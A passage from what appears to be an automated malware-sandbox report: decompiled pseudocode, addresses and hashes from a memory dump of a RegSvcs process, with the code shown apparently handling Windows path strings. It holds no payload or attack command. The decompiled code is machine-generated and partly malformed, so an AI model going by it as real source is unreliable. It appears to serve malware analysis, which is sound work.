                                          															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                          														} else {
                                          															__eflags = _t398 == 1;
                                          															if(_t398 == 1) {
                                          																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                          																_t402 =  *_t469 & 0x0000ffff;
                                          																 *(_t528 - 0xac) = _t402;
                                          																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                          															}
                                          														}
                                          													}
                                          													__eflags = _t511 -  *(_t528 - 0xe4);
                                          													if(_t511 <  *(_t528 - 0xe4)) {
                                          														break;
                                          													}
                                          													_t397 =  *(_t528 - 0x88) + 1;
                                          													 *(_t528 - 0x88) = _t397;
                                          													_t469 = _t469 + 0x10;
                                          													__eflags = _t397 -  *(_t528 + 0x1c);
                                          													_t392 =  *(_t528 - 0xa2);
                                          													if(_t397 <  *(_t528 + 0x1c)) {
                                          														continue;
                                          													}
                                          													goto L45;
                                          												}
                                          												_t475 = 0x216;
                                          												 *(_t528 - 0x74) = 0x216;
                                          												goto L45;
                                          											}
                                          										} else {
                                          											asm("lock dec dword [eax+ecx*8+0x4]");
                                          											goto L16;
                                          										}
                                          									}
                                          									_t491 = E013C4CAB(_t306, _t528 - 0xa4);
                                          									 *(_t528 - 0x74) = _t491;
                                          									__eflags = _t491;
                                          									if(_t491 != 0) {
                                          										goto L91;
                                          									} else {
                                          										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                          										goto L20;
                                          									}
                                          								}
                                          								L16:
                                          								 *(_t528 - 0x74) = 0x1069;
                                          								L93:
                                          								_t298 =  *(_t528 - 0xd0) + 1;
                                          								 *(_t528 - 0xd0) = _t298;
                                          								_t474 = _t474 + _t511;
                                          								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                          								_t494 = 4;
                                          								__eflags = _t298 - _t494;
                                          								if(_t298 >= _t494) {
                                          									goto L100;
                                          								}
                                          								_t494 =  *(_t528 - 0xcc);
                                          								_t435 = _t298;
                                          								continue;
                                          							}
                                          							__eflags = _t494[2] | _t494[3];
                                          							if((_t494[2] | _t494[3]) == 0) {
                                          								goto L15;
                                          							}
                                          							goto L12;
                                          						}
                                          						__eflags = _t301;
                                          						if(_t301 != 0) {
                                          							goto L92;
                                          						}
                                          						goto L10;
                                          						L92:
                                          						goto L93;
                                          					}
                                          				} else {
                                          					_push(0x57);
                                          					L101:
                                          					return E0134D130(_t427, _t494, _t511);
                                          				}
                                          			}










































































                                          0x013c5ffc
                                          0x013c6000
                                          0x013c6004
                                          0x013c6012
                                          0x013c6012
                                          0x013c6018
                                          0x013c6019
                                          0x013c601a
                                          0x013c601b
                                          0x013c601c
                                          0x013c6020
                                          0x013c6059
                                          0x013c605c
                                          0x013c6061
                                          0x013c6061
                                          0x013c6022
                                          0x013c6022
                                          0x013c6022
                                          0x013c6025
                                          0x013c602a
                                          0x013c602b
                                          0x013c6031
                                          0x013c6037
                                          0x013c6038
                                          0x013c603e
                                          0x013c6048
                                          0x013c6049
                                          0x013c604a
                                          0x013c604b
                                          0x013c604c
                                          0x013c604d
                                          0x013c6053
                                          0x013c6054
                                          0x013c6054
                                          0x013c6062
                                          0x013c6065
                                          0x013c6067
                                          0x013c606a
                                          0x013c6070
                                          0x013c6075
                                          0x013c6076
                                          0x013c6081
                                          0x013c6087
                                          0x013c6095
                                          0x013c6099
                                          0x013c609e
                                          0x013c60a4
                                          0x013c60ae
                                          0x013c60b0
                                          0x013c60b3
                                          0x013c60b6
                                          0x013c60b8
                                          0x013c60ba
                                          0x013c60ba
                                          0x013c60ba
                                          0x013c60ba
                                          0x013c60be
                                          0x013c60c0
                                          0x013c60c5
                                          0x013c60c5
                                          0x013c60c5
                                          0x013c60c6
                                          0x013c60cd
                                          0x013c6114
                                          0x013c60cf
                                          0x013c60cf
                                          0x013c60d4
                                          0x013c60d5
                                          0x013c60da
                                          0x013c60db
                                          0x013c60e1
                                          0x013c60e2
                                          0x013c60e8
                                          0x013c60f8
                                          0x013c60fd
                                          0x013c60fe
                                          0x013c6102
                                          0x013c6104
                                          0x013c6107
                                          0x013c6109
                                          0x013c610b
                                          0x013c610b
                                          0x013c610b
                                          0x013c610b
                                          0x013c610f
                                          0x013c610f
                                          0x013c6117
                                          0x013c611a
                                          0x013c611f
                                          0x013c6125
                                          0x013c6134
                                          0x013c6139
                                          0x013c613f
                                          0x013c6146
                                          0x013c6148
                                          0x013c614b
                                          0x013c614d
                                          0x013c614f
                                          0x013c614f
                                          0x013c614f
                                          0x013c614f
                                          0x013c6153
                                          0x013c6159
                                          0x013c6159
                                          0x013c615c
                                          0x013c6163
                                          0x013c6169
                                          0x013c616c
                                          0x013c6172
                                          0x013c6181
                                          0x013c6186
                                          0x013c6187
                                          0x013c618b
                                          0x013c6191
                                          0x013c6195
                                          0x013c61a3
                                          0x013c61bb
                                          0x013c61c0
                                          0x013c61c3
                                          0x013c61cc
                                          0x013c61d0
                                          0x013c61dc
                                          0x013c61de
                                          0x013c61e1
                                          0x013c61e4
                                          0x013c61e6
                                          0x013c61e8
                                          0x013c61e8
                                          0x013c61e8
                                          0x013c61e8
                                          0x013c61e6
                                          0x013c61ec
                                          0x013c61f3
                                          0x013c6203
                                          0x013c6209
                                          0x013c620a
                                          0x013c6216
                                          0x013c621d
                                          0x013c6227
                                          0x013c6241
                                          0x013c6246
                                          0x013c624c
                                          0x013c6257
                                          0x013c6259
                                          0x013c625c
                                          0x013c625e
                                          0x013c6260
                                          0x013c6260
                                          0x013c6260
                                          0x013c6260
                                          0x013c625e
                                          0x013c6264
                                          0x013c6267
                                          0x013c6269
                                          0x013c6315
                                          0x013c6315
                                          0x013c631b
                                          0x013c631e
                                          0x013c6324
                                          0x013c6327
                                          0x013c632f
                                          0x013c6330
                                          0x013c6333
                                          0x013c633a
                                          0x013c633c
                                          0x013c6335
                                          0x013c6335
                                          0x013c6335
                                          0x013c633f
                                          0x013c6342
                                          0x013c634c
                                          0x013c6352
                                          0x013c6355
                                          0x013c6355
                                          0x013c6359
                                          0x00000000
                                          0x013c626f
                                          0x013c6275
                                          0x013c6275
                                          0x013c6278
                                          0x013c627e
                                          0x013c627e
                                          0x013c6281
                                          0x013c6287
                                          0x013c628d
                                          0x013c6298
                                          0x013c629c
                                          0x013c62a2
                                          0x013c629e
                                          0x013c629e
                                          0x013c629e
                                          0x013c62a7
                                          0x013c62a7
                                          0x013c62aa
                                          0x013c62b0
                                          0x013c62f0
                                          0x013c62f0
                                          0x013c62f2
                                          0x013c62f8
                                          0x013c62fd
                                          0x013c62b2
                                          0x013c62b2
                                          0x013c62b2
                                          0x013c62b5
                                          0x013c62dd
                                          0x013c62e2
                                          0x013c62e5
                                          0x013c62b7
                                          0x013c62b8
                                          0x013c62bb
                                          0x013c62bd
                                          0x013c62c0
                                          0x013c62c4
                                          0x013c62cd
                                          0x013c62cd
                                          0x013c62c0
                                          0x013c62bb
                                          0x013c62b5
                                          0x013c6302
                                          0x013c6303
                                          0x013c6305
                                          0x013c6305
                                          0x013c6305
                                          0x013c630c
                                          0x013c630c
                                          0x00000000
                                          0x013c627e
                                          0x013c6269
                                          0x013c5eac
                                          0x013c5ebb
                                          0x013c5ebe
                                          0x013c5ecb
                                          0x013c5ecb
                                          0x013c5ece
                                          0x013c5ece
                                          0x013c5ed4
                                          0x013c5ed7
                                          0x013c5ed9
                                          0x013c5edb
                                          0x013c5edb
                                          0x013c5ee1
                                          0x013c5ee1
                                          0x013c5ee3
                                          0x013c5f20
                                          0x013c5f20
                                          0x013c5ee5
                                          0x013c5ee5
                                          0x013c5ee5
                                          0x013c5ee8
                                          0x013c5f11
                                          0x013c5f18
                                          0x013c5eea
                                          0x013c5eea
                                          0x013c5eed
                                          0x013c5ef2
                                          0x013c5ef8
                                          0x013c5efb
                                          0x013c5f0a
                                          0x013c5f0a
                                          0x013c5eed
                                          0x013c5ee8
                                          0x013c5f22
                                          0x013c5f28
                                          0x00000000
                                          0x00000000
                                          0x013c5f30
                                          0x013c5f31
                                          0x013c5f37
                                          0x013c5f3a
                                          0x013c5f3d
                                          0x013c5f44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c5f46
                                          0x013c5f48
                                          0x013c5f4d
                                          0x00000000
                                          0x013c5f4d
                                          0x013c5dda
                                          0x013c5ddf
                                          0x00000000
                                          0x013c5ddf
                                          0x013c5dd8
                                          0x013c5da7
                                          0x013c5da9
                                          0x013c5dac
                                          0x013c5dae
                                          0x00000000
                                          0x013c5db4
                                          0x013c5db4
                                          0x00000000
                                          0x013c5db4
                                          0x013c5dae
                                          0x013c5d88
                                          0x013c5d8d
                                          0x013c6363
                                          0x013c6369
                                          0x013c636a
                                          0x013c6370
                                          0x013c6372
                                          0x013c637a
                                          0x013c637b
                                          0x013c637d
                                          0x00000000
                                          0x00000000
                                          0x013c637f
                                          0x013c6385
                                          0x00000000
                                          0x013c6385
                                          0x013c5d38
                                          0x013c5d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c5d3b
                                          0x013c5d27
                                          0x013c5d29
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c6360
                                          0x00000000
                                          0x013c6360
                                          0x013c5c10
                                          0x013c5c10
                                          0x013c63da
                                          0x013c63e5
                                          0x013c63e5

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cdd1309ed9c310b2c4100fb7de5a1dd0720f5c004d8a9d2c2b6693d39da4799
                                          • Instruction ID: a654e148c3fb34a335590df2a0fe9c300ae8c7726826e66ee60f8e3fa17def1a
                                          • Opcode Fuzzy Hash: 4cdd1309ed9c310b2c4100fb7de5a1dd0720f5c004d8a9d2c2b6693d39da4799
                                          • Instruction Fuzzy Hash: 84423DB5A00229CFDB24CF68C841BA9BBB5BF45708F1481AED94DAB352D734AD85CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E01316E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				char _v20;
                                          				signed int _v32;
                                          				signed short _v34;
                                          				intOrPtr _v36;
                                          				signed short _v38;
                                          				signed short _v40;
                                          				char _v41;
                                          				signed int _v48;
                                          				short _v50;
                                          				signed int _v52;
                                          				signed short _v54;
                                          				signed int _v56;
                                          				char _v57;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed short _v70;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed short _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				unsigned int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				unsigned int _v128;
                                          				char _v136;
                                          				signed int __ebx;
                                          				signed int __edi;
                                          				signed int __esi;
                                          				void* __ebp;
                                          				signed int _t312;
                                          				signed int _t313;
                                          				char* _t315;
                                          				unsigned int _t316;
                                          				signed int _t317;
                                          				short* _t319;
                                          				void* _t320;
                                          				signed int _t321;
                                          				signed short _t327;
                                          				signed int _t328;
                                          				signed int _t335;
                                          				signed short* _t336;
                                          				signed int _t337;
                                          				signed int _t338;
                                          				signed int _t349;
                                          				signed short _t352;
                                          				signed int _t357;
                                          				signed int _t360;
                                          				signed int _t363;
                                          				void* _t365;
                                          				signed int _t366;
                                          				signed short* _t367;
                                          				signed int _t369;
                                          				signed int _t375;
                                          				signed int _t379;
                                          				signed int _t384;
                                          				signed int _t386;
                                          				void* _t387;
                                          				signed short _t389;
                                          				intOrPtr* _t392;
                                          				signed int _t397;
                                          				unsigned int _t399;
                                          				signed int _t401;
                                          				signed int _t402;
                                          				signed int _t407;
                                          				void* _t415;
                                          				signed short _t417;
                                          				unsigned int _t418;
                                          				signed int _t419;
                                          				signed int _t420;
                                          				signed int _t422;
                                          				intOrPtr* _t433;
                                          				signed int _t435;
                                          				void* _t436;
                                          				signed int _t437;
                                          				signed int _t438;
                                          				signed int _t440;
                                          				signed short _t443;
                                          				void* _t444;
                                          				signed int _t445;
                                          				signed int _t446;
                                          				signed int _t449;
                                          				signed int _t450;
                                          				signed int _t451;
                                          				signed int _t452;
                                          				signed int _t453;
                                          
                                          				_t425 = __edx;
                                          				_push(0xfffffffe);
                                          				_push(0x13cfca8);
                                          				_push(0x13417f0);
                                          				_push( *[fs:0x0]);
                                          				_t312 =  *0x13ed360;
                                          				_v12 = _v12 ^ _t312;
                                          				_t313 = _t312 ^ _t453;
                                          				_v32 = _t313;
                                          				_push(_t313);
                                          				 *[fs:0x0] =  &_v20;
                                          				_v116 = __edx;
                                          				_t443 = __ecx;
                                          				_v88 = __ecx;
                                          				_t386 = _a4;
                                          				_t433 = _a8;
                                          				_v112 = _t433;
                                          				_t315 = _a12;
                                          				_v64 = _t315;
                                          				_t392 = _a16;
                                          				_v108 = _t392;
                                          				if(_t433 != 0) {
                                          					 *_t433 = 0;
                                          				}
                                          				if(_t315 != 0) {
                                          					 *_t315 = 0;
                                          				}
                                          				if(_t425 > 0xffff) {
                                          					_v116 = 0xffff;
                                          				}
                                          				 *_t392 = 0;
                                          				 *((intOrPtr*)(_t392 + 4)) = 0;
                                          				_t316 =  *_t443 & 0x0000ffff;
                                          				_v104 = _t316;
                                          				_t435 = _t316 >> 1;
                                          				_v120 = _t435;
                                          				if(_t435 == 0) {
                                          					L124:
                                          					_t317 = 0;
                                          					goto L60;
                                          				} else {
                                          					_t319 =  *((intOrPtr*)(_t443 + 4));
                                          					if( *_t319 != 0) {
                                          						_t397 = _t435;
                                          						_t320 = _t319 + _t435 * 2;
                                          						_t425 = _t320 - 2;
                                          						while(_t397 != 0) {
                                          							if( *_t425 == 0x20) {
                                          								_t397 = _t397 - 1;
                                          								_t425 = _t425 - 2;
                                          								continue;
                                          							}
                                          							if(_t397 == 0) {
                                          								goto L124;
                                          							}
                                          							_t321 =  *(_t320 - 2) & 0x0000ffff;
                                          							if(_t321 == 0x5c || _t321 == 0x2f) {
                                          								_v57 = 0;
                                          							} else {
                                          								_v57 = 1;
                                          							}
                                          							_t399 = _v116 >> 1;
                                          							_v92 = _t399;
                                          							_v128 = _t399;
                                          							E0133FA60(_t386, 0, _v116);
                                          							_v56 = 0;
                                          							_v52 = 0;
                                          							_v50 = _v92 + _v92;
                                          							_v48 = _t386;
                                          							_t327 = E013174C0(_t443);
                                          							if(_t327 != 0) {
                                          								_t389 = _t327 >> 0x10;
                                          								_t328 = _t327 & 0x0000ffff;
                                          								_v112 = _t328;
                                          								_t437 = _v64;
                                          								if(_t437 == 0) {
                                          									L122:
                                          									_t438 = _t328 + 8;
                                          									_t401 = _v92;
                                          									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
                                          										_t209 = _t438 + 2; // 0xddeeddf0
                                          										_t402 = _t209;
                                          										asm("sbb eax, eax");
                                          										_t317 =  !0xffff & _t402;
                                          									} else {
                                          										E01329BC6( &_v52, 0x12d1080);
                                          										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
                                          										E01339377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
                                          										_t317 = _t438;
                                          									}
                                          									goto L60;
                                          								}
                                          								if(_t389 != 0) {
                                          									_t425 = _t389;
                                          									_t335 = E013746A7(_t443, _t389, _t437);
                                          									if(_t335 < 0) {
                                          										goto L124;
                                          									}
                                          									if( *_t437 != 0) {
                                          										goto L124;
                                          									}
                                          									_t328 = _v112;
                                          								}
                                          								goto L122;
                                          							} else {
                                          								_t425 = _t443;
                                          								_t336 =  *(_t425 + 4);
                                          								_t407 =  *_t425 & 0x0000ffff;
                                          								if(_t407 < 2) {
                                          									L17:
                                          									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
                                          										_t337 = 5;
                                          									} else {
                                          										if(_t407 < 6) {
                                          											L98:
                                          											_t337 = 3;
                                          											L23:
                                          											 *_v108 = _t337;
                                          											_t409 = 0;
                                          											_v72 = 0;
                                          											_v68 = 0;
                                          											_v64 = 0;
                                          											_v84 = 0;
                                          											_v41 = 0;
                                          											_t445 = 0;
                                          											_v76 = 0;
                                          											_v8 = 0;
                                          											if(_t337 != 2) {
                                          												_t338 = _t337 - 1;
                                          												if(_t338 > 6) {
                                          													L164:
                                          													_t446 = 0;
                                          													_v64 = 0;
                                          													_t439 = _v92;
                                          													goto L59;
                                          												}
                                          												switch( *((intOrPtr*)(_t338 * 4 +  &M0131749C))) {
                                          													case 0:
                                          														__ecx = 0;
                                          														__eflags = 0;
                                          														_v124 = 0;
                                          														__esi = 2;
                                          														while(1) {
                                          															_v100 = __esi;
                                          															__eflags = __esi - __edi;
                                          															if(__esi >= __edi) {
                                          																break;
                                          															}
                                          															__eax =  *(__edx + 4);
                                          															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
                                          															__eflags = __eax - 0x5c;
                                          															if(__eax == 0x5c) {
                                          																L140:
                                          																__ecx = __ecx + 1;
                                          																_v124 = __ecx;
                                          																__eflags = __ecx - 2;
                                          																if(__ecx == 2) {
                                          																	break;
                                          																}
                                          																L141:
                                          																__esi = __esi + 1;
                                          																continue;
                                          															}
                                          															__eflags = __eax - 0x2f;
                                          															if(__eax != 0x2f) {
                                          																goto L141;
                                          															}
                                          															goto L140;
                                          														}
                                          														__eax = __esi;
                                          														_v80 = __esi;
                                          														__eax =  *(__edx + 4);
                                          														_v68 =  *(__edx + 4);
                                          														__eax = __esi + __esi;
                                          														_v72 = __ax;
                                          														__eax =  *(__edx + 2) & 0x0000ffff;
                                          														_v70 = __ax;
                                          														_v76 = __esi;
                                          														goto L80;
                                          													case 1:
                                          														goto L164;
                                          													case 2:
                                          														__eax = E012F52A5(__ecx);
                                          														_v84 = __eax;
                                          														_v41 = 1;
                                          														__eflags = __eax;
                                          														if(__eax == 0) {
                                          															__eax =  *[fs:0x30];
                                          															__ebx =  *(__eax + 0x10);
                                          															__ebx =  *(__eax + 0x10) + 0x24;
                                          														} else {
                                          															__ebx = __eax + 0xc;
                                          														}
                                          														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
                                          														__eax = L01302600( *( *(__ebx + 4)) & 0x0000ffff);
                                          														__si = __ax;
                                          														_v88 =  *(_v88 + 4);
                                          														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
                                          														__eax = L01302600( *( *(_v88 + 4)) & 0x0000ffff);
                                          														_v54 = __ax;
                                          														__eflags = __ax - __ax;
                                          														if(__eflags != 0) {
                                          															__cx = __ax;
                                          															L01374735(__ecx, __edx, __eflags) = 0x3d;
                                          															_v40 = __ax;
                                          															__si = _v54;
                                          															_v38 = __si;
                                          															_v36 = 0x3a;
                                          															 &_v40 =  &_v136;
                                          															E0133BB40(__ecx,  &_v136,  &_v40) =  &_v52;
                                          															__eax =  &_v136;
                                          															__eax = E01322010(__ecx, 0,  &_v136,  &_v52);
                                          															__eflags = __eax;
                                          															if(__eax >= 0) {
                                          																__ax = _v52;
                                          																_v56 = __eax;
                                          																__edx = __ax & 0x0000ffff;
                                          																__ecx = __edx;
                                          																__ecx = __edx >> 1;
                                          																_v100 = __ecx;
                                          																__eflags = __ecx - 3;
                                          																if(__ecx <= 3) {
                                          																	L155:
                                          																	__ebx = _v48;
                                          																	L156:
                                          																	_v72 = __ax;
                                          																	goto L119;
                                          																}
                                          																__eflags = __ecx - _v92;
                                          																if(__ecx >= _v92) {
                                          																	goto L155;
                                          																}
                                          																__esi = 0x5c;
                                          																__ebx = _v48;
                                          																 *(__ebx + __ecx * 2) = __si;
                                          																__eax = __edx + 2;
                                          																_v56 = __edx + 2;
                                          																_v52 = __ax;
                                          																goto L156;
                                          															}
                                          															__eflags = __eax - 0xc0000023;
                                          															if(__eax != 0xc0000023) {
                                          																__eax = 0;
                                          																_v52 = __ax;
                                          																_v40 = __si;
                                          																_v38 = 0x5c003a;
                                          																_v34 = __ax;
                                          																__edx =  &_v40;
                                          																__ecx =  &_v52;
                                          																L01374658(__ecx,  &_v40) = 8;
                                          																_v72 = __ax;
                                          																__ebx = _v48;
                                          																__ax = _v52;
                                          																_v56 = 8;
                                          																goto L119;
                                          															}
                                          															__ax = _v52;
                                          															_v56 = __eax;
                                          															__eax = __ax & 0x0000ffff;
                                          															__eax = (__ax & 0x0000ffff) + 2;
                                          															_v64 = __eax;
                                          															__eflags = __eax - 0xffff;
                                          															if(__eax <= 0xffff) {
                                          																_v72 = __ax;
                                          																__ebx = _v48;
                                          																goto L119;
                                          															}
                                          															__esi = 0;
                                          															_v64 = 0;
                                          															__ebx = _v48;
                                          															__edi = _v92;
                                          															goto L58;
                                          														} else {
                                          															__eax =  *__ebx;
                                          															_v72 =  *__ebx;
                                          															__eax =  *(__ebx + 4);
                                          															_v68 =  *(__ebx + 4);
                                          															__edx =  &_v72;
                                          															__ecx =  &_v52;
                                          															__eax = E01329BC6(__ecx,  &_v72);
                                          															__ebx = _v48;
                                          															__eax = _v52 & 0x0000ffff;
                                          															_v56 = _v52 & 0x0000ffff;
                                          															L119:
                                          															__eax = 3;
                                          															_v80 = 3;
                                          															__esi = 2;
                                          															_v76 = 2;
                                          															__edx = _v88;
                                          															goto L25;
                                          														}
                                          													case 3:
                                          														__eax = E012F52A5(__ecx);
                                          														_v84 = __eax;
                                          														_v41 = 1;
                                          														__eflags = __eax;
                                          														if(__eax == 0) {
                                          															__eax =  *[fs:0x30];
                                          															__ebx =  *(__eax + 0x10);
                                          															__ebx =  *(__eax + 0x10) + 0x24;
                                          															__eflags = __ebx;
                                          															__esi = _v76;
                                          														} else {
                                          															__ebx = __eax + 0xc;
                                          														}
                                          														__ecx = __ebx;
                                          														__eax = L012F83AE(__ebx);
                                          														_v80 = __eax;
                                          														__ecx =  *__ebx;
                                          														_v72 =  *__ebx;
                                          														__ecx =  *(__ebx + 4);
                                          														_v68 = __ecx;
                                          														__eflags = __eax - 3;
                                          														if(__eax == 3) {
                                          															__eax = 4;
                                          															_v72 = __ax;
                                          														} else {
                                          															__ecx = __eax + __eax;
                                          															_v72 = __cx;
                                          														}
                                          														goto L80;
                                          													case 4:
                                          														_t340 = E012F52A5(0);
                                          														_v84 = _t340;
                                          														_v41 = 1;
                                          														__eflags = _t340;
                                          														if(_t340 == 0) {
                                          															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                          															_t445 = _v76;
                                          														} else {
                                          															_t428 = _t340 + 0xc;
                                          															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
                                          														}
                                          														_v72 =  *_t428;
                                          														_v68 = _t428[2];
                                          														_v80 = L012F83AE(_t428);
                                          														L80:
                                          														E01329BC6( &_v52,  &_v72);
                                          														_t386 = _v48;
                                          														_v56 = _v52 & 0x0000ffff;
                                          														_t425 = _v88;
                                          														goto L25;
                                          													case 5:
                                          														__eax = 4;
                                          														_v80 = 4;
                                          														__esi = 4;
                                          														_v76 = 4;
                                          														__eflags = __edi - 4;
                                          														if(__edi < 4) {
                                          															__esi = __edi;
                                          															_v76 = __esi;
                                          														}
                                          														__eax =  *0x12d1080;
                                          														_v72 =  *0x12d1080;
                                          														__eax =  *0x12d1084;
                                          														_v68 =  *0x12d1084;
                                          														__edx =  &_v72;
                                          														__ecx =  &_v52;
                                          														__eax = E01329BC6(__ecx,  &_v72);
                                          														__eax = _v52 & 0x0000ffff;
                                          														_v56 = __eax;
                                          														__edx = _v88;
                                          														__ebx = _v48;
                                          														__eflags = __eax - 6;
                                          														if(__eax >= 6) {
                                          															__eax =  *(__edx + 4);
                                          															__ax =  *((intOrPtr*)(__eax + 4));
                                          															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
                                          														}
                                          														__eax = _v108;
                                          														__eflags =  *_v108 - 7;
                                          														if( *_v108 == 7) {
                                          															_v57 = 0;
                                          														}
                                          														goto L25;
                                          												}
                                          											} else {
                                          												_v80 = 3;
                                          												L25:
                                          												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
                                          												_v104 = _t349;
                                          												_t415 = _t349 + 2;
                                          												if(_t415 > _v116) {
                                          													if(_t435 <= 1) {
                                          														if( *( *(_t425 + 4)) != 0x2e) {
                                          															goto L72;
                                          														}
                                          														if(_t435 != 1) {
                                          															asm("sbb esi, esi");
                                          															_t446 =  !_t445 & _v104;
                                          															_v64 = _t446;
                                          															_t439 = _v92;
                                          															L58:
                                          															_t409 = _v84;
                                          															L59:
                                          															_v8 = 0xfffffffe;
                                          															E0131746D(_t386, _t409, _t439, _t446);
                                          															_t317 = _t446;
                                          															L60:
                                          															 *[fs:0x0] = _v20;
                                          															_pop(_t436);
                                          															_pop(_t444);
                                          															_pop(_t387);
                                          															return E0133B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
                                          														}
                                          														_t417 = _v72;
                                          														if(_t417 != 8) {
                                          															if(_v116 >= (_t417 & 0x0000ffff)) {
                                          																_t352 = _v56;
                                          																_t418 = _t352 & 0x0000ffff;
                                          																_v104 = _t418;
                                          																_t419 = _t418 >> 1;
                                          																_v100 = _t419;
                                          																if(_t419 != 0) {
                                          																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
                                          																		_t352 = _v104 + 0xfffffffe;
                                          																		_v56 = _t352;
                                          																		_v52 = _t352;
                                          																	}
                                          																}
                                          																L27:
                                          																_t420 = 0;
                                          																_v100 = 0;
                                          																L28:
                                          																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
                                          																	goto L69;
                                          																} else {
                                          																	_t422 = (_v56 & 0x0000ffff) >> 1;
                                          																	_v96 = _t422;
                                          																}
                                          																while(_t445 < _t435) {
                                          																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
                                          																	if(_t363 == 0x5c) {
                                          																		L44:
                                          																		if(_t422 == 0) {
                                          																			L46:
                                          																			 *(_t386 + _t422 * 2) = 0x5c;
                                          																			_t422 = _t422 + 1;
                                          																			_v96 = _t422;
                                          																			L43:
                                          																			_t445 = _t445 + 1;
                                          																			_v76 = _t445;
                                          																			continue;
                                          																		}
                                          																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
                                          																			goto L43;
                                          																		}
                                          																		goto L46;
                                          																	}
                                          																	_t365 = _t363 - 0x2e;
                                          																	if(_t365 == 0) {
                                          																		_t126 = _t445 + 1; // 0x2
                                          																		_t366 = _t126;
                                          																		_v104 = _t366;
                                          																		if(_t366 == _t435) {
                                          																			goto L43;
                                          																		}
                                          																		_t367 =  *(_t425 + 4);
                                          																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
                                          																		_v108 = _t440;
                                          																		_t435 = _v120;
                                          																		if(_t440 != 0x5c) {
                                          																			if(_v108 == 0x2f) {
                                          																				goto L83;
                                          																			}
                                          																			if(_v108 != 0x2e) {
                                          																				L35:
                                          																				while(_t445 < _t435) {
                                          																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
                                          																					if(_t369 == 0x5c || _t369 == 0x2f) {
                                          																						if(_t445 < _t435) {
                                          																							if(_t422 >= 2) {
                                          																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
                                          																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
                                          																										_t422 = _t422 - 1;
                                          																										_v96 = _t422;
                                          																									}
                                          																								}
                                          																							}
                                          																						}
                                          																						break;
                                          																					} else {
                                          																						 *(_t386 + _t422 * 2) = _t369;
                                          																						_t422 = _t422 + 1;
                                          																						_v96 = _t422;
                                          																						_t445 = _t445 + 1;
                                          																						_v76 = _t445;
                                          																						continue;
                                          																					}
                                          																				}
                                          																				_t445 = _t445 - 1;
                                          																				_v76 = _t445;
                                          																				goto L43;
                                          																			}
                                          																			_t155 = _t445 + 2; // 0x3
                                          																			_t425 = _v88;
                                          																			if(_t155 == _t435) {
                                          																				while(1) {
                                          																					L103:
                                          																					if(_t422 < _v80) {
                                          																						break;
                                          																					}
                                          																					 *(_t386 + _t422 * 2) = 0;
                                          																					_t425 = _v88;
                                          																					if( *(_t386 + _t422 * 2) != 0x5c) {
                                          																						_t422 = _t422 - 1;
                                          																						_v96 = _t422;
                                          																						continue;
                                          																					} else {
                                          																						goto L105;
                                          																					}
                                          																					while(1) {
                                          																						L105:
                                          																						if(_t422 < _v80) {
                                          																							goto L180;
                                          																						}
                                          																						 *(_t386 + _t422 * 2) = 0;
                                          																						_t435 = _v120;
                                          																						if( *(_t386 + _t422 * 2) == 0x5c) {
                                          																							if(_t422 < _v80) {
                                          																								goto L180;
                                          																							}
                                          																							L110:
                                          																							_t445 = _t445 + 1;
                                          																							_v76 = _t445;
                                          																							goto L43;
                                          																						}
                                          																						_t422 = _t422 - 1;
                                          																						_v96 = _t422;
                                          																					}
                                          																					break;
                                          																				}
                                          																				L180:
                                          																				_t422 = _t422 + 1;
                                          																				_v96 = _t422;
                                          																				goto L110;
                                          																			}
                                          																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
                                          																			if(_t375 != 0x5c) {
                                          																				if(_t375 != 0x2f) {
                                          																					goto L35;
                                          																				}
                                          																			}
                                          																			goto L103;
